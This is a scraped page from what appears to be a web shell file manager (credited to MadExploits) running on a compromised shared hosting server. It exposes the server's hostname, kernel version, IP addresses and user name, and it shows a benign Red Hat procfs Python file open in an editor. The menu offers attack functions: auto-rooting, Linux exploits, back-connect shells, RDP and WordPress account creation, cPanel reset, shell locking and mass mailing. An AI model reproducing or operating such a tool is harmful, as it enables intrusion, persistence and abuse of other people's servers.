Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.14.143.149
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.6 /
site-packages /
procfs /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
400
B
-rwxr-xr-x
procfs.py
35.45
KB
-rwxr-xr-x
utilist.py
887
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utilist.py
#! /usr/bin/python3 # -*- python -*- # -*- coding: utf-8 -*- # SPDX-License-Identifier: GPL-2.0-only # # Copyright (C) 2007 Red Hat, Inc. # from six.moves import range def hexbitmask(l, nr_entries): hexbitmask = [] bit = 0 mask = 0 for entry in range(nr_entries): if entry in l: mask |= (1 << bit) bit += 1 if bit == 32: bit = 0 hexbitmask.insert(0, mask) mask = 0 if bit < 32 and mask != 0: hexbitmask.insert(0, mask) return hexbitmask def bitmasklist(line, nr_entries): hexmask = line.strip().replace(",", "") bitmasklist = [] entry = 0 bitmask = bin(int(hexmask, 16))[2::] for i in reversed(bitmask): if int(i) & 1: bitmasklist.append(entry) entry += 1 if entry == nr_entries: break return bitmasklist
Close